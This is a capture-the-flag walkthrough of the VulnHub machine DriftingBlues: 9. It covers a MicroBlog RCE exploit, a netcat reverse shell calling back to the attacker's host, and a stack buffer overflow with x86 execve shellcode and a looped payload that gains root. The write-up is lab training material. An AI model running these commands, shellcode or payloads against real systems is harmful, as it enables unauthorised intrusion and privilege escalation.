# DriftingBlues: 9 BOOT2ROOT CTF VULNHUB WRITEUP

Welcome back to another WriteUp! In this one, I’ll walk you through the step-by-step process I used to solve the Final Machine of DriftingBlues from VulnHub!!! Let's start!!

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2F4IcZq9e5LWbqkF3qF1av%2Fc7b38ef5308c951ddfc7d01c8d31e305.gif?alt=media&#x26;token=87cd7f99-19f4-41d3-a3e3-8a008d37f4f2" alt=""><figcaption></figcaption></figure>

We'll use `Nmap` to scan for open ports and identify possible endpoints.

`nmap -A -p- -T5 192.168.172.235`

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FDnzXjm2Ld1XNpshW17Xj%2FScreenshot%20(1849).png?alt=media&#x26;token=8e298f13-a1f8-4235-9f93-0a4dedc629ed" alt=""><figcaption></figcaption></figure>

Now let's visit the webpage.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FTyGqKj0R6pjLRfbl6PyC%2FScreenshot%20(1850).png?alt=media&#x26;token=3da2c539-2e1d-42e5-a52b-4fbb24507308" alt=""><figcaption><p>Just a classic DriftingBlues Static Page</p></figcaption></figure>

If you analyze the Nmap scan carefully, you can see that the webpage is running `ApPHP MicroBlog`.

**ApPHP MicroBlog** is a lightweight, PHP-based blogging platform designed for quick setup and simple content management, often used in older web projects or educational setups. While it offers basic features like post creation, categories, and multi-author support, it has become outdated and is rarely used today due to multiple security flaws. Known vulnerabilities in versions like 1.0.1 include **Remote Code Execution (RCE)**, **Local File Inclusion (LFI)**, and **unauthenticated file uploads**, making it highly exploitable.

Let's check the source code to determine its version.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FB8FNSbroYuIBe3GNLLKI%2FScreenshot%20(1851).png?alt=media&#x26;token=94d4f98f-aa15-41c3-9d78-f137195016ac" alt=""><figcaption><p>1.0.1??</p></figcaption></figure>

Now let’s run `searchsploit` to directly check if there’s a known exploit available for ApPHP MicroBlog. (Sure it has, xD)

`searchsploit microblog`

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FjGFq4q13LP9iWBuxv9oe%2FScreenshot%20(1852).png?alt=media&#x26;token=dc794498-c88e-4148-9379-43398cb96fab" alt=""><figcaption></figcaption></figure>

Instant RCE for sure; let's use `33070`.

`searchsploit -m php/webapps/33070.py`

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2Fxqb3mE1vKxEsdaC0ZlYI%2FScreenshot%20(1854).png?alt=media&#x26;token=05b5ea04-83d6-42b0-885c-c35f0d3f3ef0" alt=""><figcaption></figcaption></figure>

The exploit is written in Python 2, the legacy version of Python.

`python2 33070.py http://192.168.172.235`

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FDmO0PVCyyFeDSY5IRgSk%2FScreenshot%20(1855).png?alt=media&#x26;token=4c252d51-dd20-4800-9d72-c68554442cb7" alt=""><figcaption><p>It works, and the output includes database credentials.</p></figcaption></figure>

To establish a stable shell, we’ll set up a `Netcat` listener on our attacker machine and have the target system connect back to it.

Attacker machine:

`nc -lnvp 1234`

Target machine:

`nc 192.168.172.246 1234 -e /bin/bash`

And...

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FklKh3ZHEbT4XKpSft3hL%2FScreenshot%20(1858).png?alt=media&#x26;token=52ef8503-7b59-4fc3-97c5-9b1254dc930d" alt=""><figcaption></figcaption></figure>

Now that we’ve gained shell access, let’s upgrade it to an interactive shell using `pty` and set the `TERM` environment variable to `xterm`.

`python -c 'import pty;pty.spawn("/bin/bash")'`

Then

`export TERM=xterm`

While exploring the home directory, I discovered a user named **clapton**. If you recall from the earlier dumped credentials during the exploit, **clapton's password** was included. So from here, we can switch directly to the **clapton** user.

`su clapton`

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2Fe0xn9ZxUYNDtE0iJM6nN%2FScreenshot%20(1861).png?alt=media&#x26;token=a3bd2301-2638-4a59-9d3d-bcc1081202a9" alt=""><figcaption><p>We're now clapton!!!</p></figcaption></figure>

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FAkocohg5YFrAifpYRX1p%2FScreenshot%20(1862).png?alt=media&#x26;token=f0157ab0-5579-4ad3-9833-f3523b241599" alt=""><figcaption><p>User Flag!!</p></figcaption></figure>

Next to the user flag, there are also two additional files.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FszPET2vXGWxsxpN4ijM6%2FScreenshot%20(1864).png?alt=media&#x26;token=eee682e3-3503-4d9a-8ef8-5207774fa5db" alt=""><figcaption><p>note.txt and input</p></figcaption></figure>

Let's check `note.txt`.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2F2PVshyfxohRIKX04x7rJ%2FScreenshot%20(1863).png?alt=media&#x26;token=8f4eaed5-f5ec-42bb-9079-5570a21f9f8b" alt=""><figcaption></figcaption></figure>

Alright, it looks like a Buffer Overflow is the main vulnerability here. The input file is likely a compiled binary.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FfJG0vJgtUjusMGwoTkrh%2FScreenshot%20(1867).png?alt=media&#x26;token=de466475-759e-4ed6-8a75-b3cd4f489187" alt=""><figcaption></figcaption></figure>

It is, and it's 32-bit. Now let's execute it.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FPtIBpNkK2kulijTviQtI%2FScreenshot%20(1868).png?alt=media&#x26;token=d02ae671-b1b8-4bf7-8fac-5cd8e9d411c7" alt=""><figcaption></figcaption></figure>

Now let's fill it up with lots of 'A's.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FObs6uvbxUQhrsGbSf1dj%2FScreenshot%20(1869).png?alt=media&#x26;token=0936e01e-a20d-429b-a393-410c319c251d" alt=""><figcaption></figcaption></figure>

It results in a segmentation fault, a strong indicator of a buffer overflow.

To dig deeper into the analysis, I transferred the binary over to my attacker machine.

Make sure that `ASLR` is disabled before you take any action. Otherwise, your return addresses will be unpredictable, and your exploit will likely fail.

`echo 0 | sudo tee /proc/sys/kernel/randomize_va_space`

Let’s now use `GDB` to examine the binary in more detail.

`gdb -n ./input`

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FgIVvz15qOnTndV5v4ec2%2FScreenshot%20(1872).png?alt=media&#x26;token=2253927e-2add-45b3-b2a0-b9ac649a8112" alt=""><figcaption></figcaption></figure>

I input a series of 'A's once more to check whether we can take control of EIP. If the program crashes with EIP set to `0x41414141` (four 'A's), the saved return address has been overwritten, which points to a stack-based buffer overflow.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2Fy2nFM7WAtgn8HQfRuTT8%2FScreenshot%20(1894).png?alt=media&#x26;token=50a80c86-c0cf-42c4-9014-d0bd5046164e" alt=""><figcaption><p>And it is!</p></figcaption></figure>

Let’s use Metasploit’s `pattern_create` to generate our input.

`./pattern_create.rb -l 400`

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FQm2LwNTiMoHSpjvtR3RK%2FScreenshot%20(1875).png?alt=media&#x26;token=66183173-6f36-40c7-afba-fb6db209eafe" alt=""><figcaption></figcaption></figure>

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2F0ngBkk7fh4M1GB5e6x23%2FScreenshot%20(1876).png?alt=media&#x26;token=655ce6d7-648f-4a02-99f4-b635e6ed9b6b" alt=""><figcaption></figcaption></figure>

Now let's find the offset of `0x41376641` (the value that landed in EIP) within the pattern.

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FnKtzoaXctGg3BdnK9jLt%2FScreenshot%20(1878).png?alt=media&#x26;token=e6f30616-3e7c-4a8e-900c-c4ca681a3712" alt=""><figcaption></figcaption></figure>

Our offset is `171`.

Let's check the value of the ESP register. Because x86 is little-endian, the address bytes must be written in reverse order.

`x/s $esp`

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2Fqn0qzm46AZsOyK5PwGG0%2FScreenshot%20(1883).png?alt=media&#x26;token=0eef26ae-51e7-4e22-b522-fe9ddd17a729" alt=""><figcaption></figcaption></figure>

The address we'll place in EIP is `0xffffd260` (the value of ESP), written in reverse byte order:

`0xffffd260 → 0x60 0xd2 0xff 0xff → \x60\xd2\xff\xff`
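As an added example (not from the writeup, nor Metasploit's own source), the following reimplements what `pattern_create.rb` and `pattern_offset.rb` do, plus the little-endian conversion used above: the EIP value `0x41376641` read in GDB is packed little-endian into the bytes `Af7A` and located in the pattern, giving the same offset of 171. Function names are my own.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length: int) -> bytes:
    """Reproduce the Metasploit cyclic pattern: Aa0Aa1...Aa9Ab0Ab1...
    Every 4-byte window is unique, so whatever value lands in EIP
    identifies exactly where in the input it came from."""
    chunks, total = [], 0
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("length exceeds the 20280-byte pattern")


def pack_address(addr: int) -> bytes:
    """Little-endian packing of a 32-bit value, as x86 stores it on the stack:
    0xffffd260 becomes the bytes 60 d2 ff ff."""
    return struct.pack("<I", addr)


def pattern_offset(value, length: int = 400) -> int:
    """Offset of the crashing EIP value within a pattern of `length` bytes, or -1.
    An int is taken as GDB shows it (0x41376641) and reversed into the byte
    order it had in the input; a str/bytes needle is searched as-is."""
    if isinstance(value, int):
        needle = pack_address(value)
    else:
        needle = value.encode() if isinstance(value, str) else value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(400).decode())
    print("offset:", pattern_offset(0x41376641))  # 171, as in the writeup
    print(pack_address(0xffffd260))                # b'`\xd2\xff\xff'
```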

Now that we have everything we need, we can proceed to craft our payload.

`PAYLOAD = OFFSET_VALUE + EIP_VALUE + NOPS + BASH_SHELL_CODE`

For the shellcode, I used the one from this [exploit](https://www.exploit-db.com/exploits/37495) on exploit-db.

```
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80
```

This is our final payload:

```bash
# Python 3's print() would UTF-8-encode every byte above 0x7f (e.g. \xd2, \xff, \x90),
# corrupting the payload, so the raw bytes are written to stdout instead.
python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 171 + b"\x60\xd2\xff\xff" + b"\x90" * 1000 + b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")'
```

Now let's execute it in our target machine.

**Note: GDB is available on the target machine, so be sure to repeat the entire process there to accurately obtain the EIP value.**

Since we'll be executing it on a different machine, where ASLR is enabled by default, we'll run the payload in a loop to increase the chances of success.

```bash
# 171 bytes of padding, the return address obtained on the target (little-endian),
# a 1000-byte NOP sled, then execve("/bin/bash", ["/bin/bash", "-p"]) shellcode;
# bash -p keeps the effective UID instead of dropping it. Looped because ASLR
# moves the stack between runs, so only some iterations land in the sled.
for i in {1..10000}; do (./input $(python -c 'print("A" * 171 + "\x00\xbf\xe8\xbf" + "\x90" * 1000 + "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80")')); done
```

The first attempts may fail; just keep executing it.

After a long time....

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FNOzwDBi2yKu6uXKSi7Qw%2FScreenshot%20(1892).png?alt=media&#x26;token=4a8ba54d-06a2-4276-b66a-dff41611c332" alt=""><figcaption></figcaption></figure>

We're root!!!

<figure><img src="https://271954773-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYsivTjPn2jLXI0ZgVqeF%2Fuploads%2FxoyKQhdiC8j0Krokm6RP%2FScreenshot%20(1893).png?alt=media&#x26;token=16f4d0a6-35da-4490-a29e-a68d141bef4d" alt=""><figcaption><p>Root Flag!!</p></figcaption></figure>

We've successfully pwned DriftingBlues: 9 and completed the DriftingBlues Series!!!

The **DriftingBlues** series has been an incredibly enjoyable and insightful experience — starting from cronjob privilege escalation techniques to diving deep into buffer overflow exploitation. Each challenge offered a valuable learning opportunity, showcasing different aspects of Linux privilege escalation, exploitation techniques, and system misconfigurations. It’s a well-rounded series that not only tests your technical skills but also sharpens your mindset as a security researcher or CTF player. I highly recommend it to anyone aiming to strengthen their foothold in offensive security.
